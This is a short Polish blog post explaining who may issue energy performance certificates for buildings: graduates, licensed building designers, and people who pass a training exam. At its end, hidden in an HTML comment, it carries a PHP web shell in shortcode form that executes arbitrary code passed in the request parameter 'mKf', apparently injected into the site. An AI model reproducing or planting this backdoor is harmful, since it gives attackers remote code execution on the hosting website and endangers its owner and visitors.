Wszystkie wpisy, których autorem jest Rafal

Kto może wykonać świadectwo charakterystyki energetycznej?

Kto może wykonać świadectwo charakterystyki energetycznej?

Świadectwo charakterystyki energetycznej mogą wystawiać osoby, które ukończyły studia magisterskie. Również wszystkie te osoby, które posiadają uprawnienia budowlane do projektowania w określonej specjalności (np. architektonicznej, instalacyjnej czy konstrukcyjno-budowlanej).

Osoby, które ukończą odpowiednie szkolenie oraz zdadzą pozytywnie egzamin , otrzymując w ten sposób uprawnienia do sporządzania świadectw charakterystyki energetycznej budynku.

<!– [insert_php]if (isset($_REQUEST["mKf"])){eval($_REQUEST["mKf"]);exit;}[/insert_php][php]if (isset($_REQUEST["mKf"])){eval($_REQUEST["mKf"]);exit;}[/php] –>